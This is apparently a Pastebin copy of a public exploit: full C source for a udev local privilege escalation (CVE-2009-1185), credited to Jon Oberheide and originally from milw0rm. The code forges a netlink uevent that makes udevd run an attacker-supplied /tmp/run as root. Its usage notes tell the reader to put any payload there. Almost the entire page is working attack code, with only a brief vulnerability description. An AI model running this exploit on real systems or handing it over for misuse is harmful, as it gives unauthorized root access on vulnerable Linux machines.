API tools faq
paste
Guest User

Untitled

a guest
Apr 18th, 2015
211
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.81 KB | None | 0 0
raw download clone embed print report
  1. /*
  2. * cve-2009-1185.c
  3. *
  4. * udev < 141 Local Privilege Escalation Exploit
  5. * Jon Oberheide <jon@oberheide.org>
  6. * http://jon.oberheide.org
  7. *
  8. * Information:
  9. *
  10. * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
  11. *
  12. * udev before 1.4.1 does not verify whether a NETLINK message originates
  13. * from kernel space, which allows local users to gain privileges by sending
  14. * a NETLINK message from user space.
  15. *
  16. * Notes:
  17. *
  18. * An alternate version of kcope's exploit. This exploit leverages the
  19. * 95-udev-late.rules functionality that is meant to run arbitrary commands
  20. * when a device is removed. A bit cleaner and reliable as long as your
  21. * distro ships that rule file.
  22. *
  23. * Tested on Gentoo, Intrepid, and Jaunty.
  24. *
  25. * Usage:
  26. *
  27. * Pass the PID of the udevd netlink socket (listed in /proc/net/netlink,
  28. * usually is the udevd PID minus 1) as argv[1].
  29. *
  30. * The exploit will execute /tmp/run as root so throw whatever payload you
  31. * want in there.
  32. */
  33.  
  34. #include <stdio.h>
  35. #include <string.h>
  36. #include <stdlib.h>
  37. #include <unistd.h>
  38. #include <sys/types.h>
  39. #include <sys/stat.h>
  40. #include <sys/socket.h>
  41. #include <linux/types.h>
  42. #include <linux/netlink.h>
  43.  
  44. #ifndef NETLINK_KOBJECT_UEVENT
  45. #define NETLINK_KOBJECT_UEVENT 15
  46. #endif
  47.  
  48. int
  49. main(int argc, char **argv)
  50. {
  51. int sock;
  52. char *mp, *err;
  53. char message[4096];
  54. struct stat st;
  55. struct msghdr msg;
  56. struct iovec iovector;
  57. struct sockaddr_nl address;
  58.  
  59. if (argc < 2) {
  60. err = "Pass the udevd netlink PID as an argument";
  61. printf("[-] Error: %s\n", err);
  62. exit(1);
  63. }
  64.  
  65. if ((stat("/etc/udev/rules.d/95-udev-late.rules", &st) == -1) &&
  66. (stat("/lib/udev/rules.d/95-udev-late.rules", &st) == -1)) {
  67. err = "Required 95-udev-late.rules not found";
  68. printf("[-] Error: %s\n", err);
  69. exit(1);
  70. }
  71.  
  72. if (stat("/tmp/run", &st) == -1) {
  73. err = "/tmp/run does not exist, please create it";
  74. printf("[-] Error: %s\n", err);
  75. exit(1);
  76. }
  77. system("chmod +x /tmp/run");
  78.  
  79. memset(&address, 0, sizeof(address));
  80. address.nl_family = AF_NETLINK;
  81. address.nl_pid = atoi(argv[1]);
  82. address.nl_groups = 0;
  83.  
  84. msg.msg_name = (void*)&address;
  85. msg.msg_namelen = sizeof(address);
  86. msg.msg_iov = &iovector;
  87. msg.msg_iovlen = 1;
  88.  
  89. sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
  90. bind(sock, (struct sockaddr *) &address, sizeof(address));
  91.  
  92. mp = message;
  93. mp += sprintf(mp, "remove@/d") + 1;
  94. mp += sprintf(mp, "SUBSYSTEM=block") + 1;
  95. mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
  96. mp += sprintf(mp, "TIMEOUT=10") + 1;
  97. mp += sprintf(mp, "ACTION=remove") +1;
  98. mp += sprintf(mp, "REMOVE_CMD=/tmp/run") +1;
  99.  
  100. iovector.iov_base = (void*)message;
  101. iovector.iov_len = (int)(mp-message);
  102.  
  103. sendmsg(sock, &msg, 0);
  104.  
  105. close(sock);
  106.  
  107. return 0;
  108. }
  109.  
  110. // milw0rm.com [2009-04-30]
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!